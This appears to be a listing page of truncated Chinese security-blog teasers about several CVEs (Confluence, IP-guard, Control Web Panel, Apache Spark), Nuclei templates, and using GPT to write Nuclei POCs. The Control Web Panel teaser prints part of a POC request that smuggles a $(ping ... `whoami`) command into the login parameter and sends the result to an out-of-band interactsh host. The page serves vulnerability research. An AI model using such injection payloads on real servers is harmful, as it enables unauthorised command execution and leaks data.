漏洞描述:CVE-2023-22527 是 Atlassian Confluence 服务器和数据中心中的一个严重漏洞。此漏洞存在于较旧版本的Confluence Data Center和Server...
[Nuclei-04]Nuclei实际使用中一些常用模板
0x01Nuclei技巧 我们在做测试的时候越来越习惯用nuclei做测试,1是模板编写简单易上手,2是可以兼容很多情况如反序列化、文件上传甚至口令爆破都可以写成nuclei脚本,3是可...
IP-guard flexpaper远程命令执行漏洞
漏洞描述 在数字化时代,医药企业在信息化进程中不可避免地面临着日益增长的数据资产威胁。为了确保其关键信息资产的安全性、机密性和可用性,医药企业日益倚重于先进的信息安全解决方案。其中,备受瞩...
如何用GPT自动化生成Nuclei的POC
前言在之前的公众号文章中使用ChatGPT结合llama-index做的embedding查询,就想到结合Nuclei的文档来根据我的请求和响应编写对应POC。由于llama-index对可扩展性太小...
Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877
POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Hos...
Apache Spark UI 命令注入漏洞(CVE-2022-33891)
影响版本:3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.Fix:https://github.com/...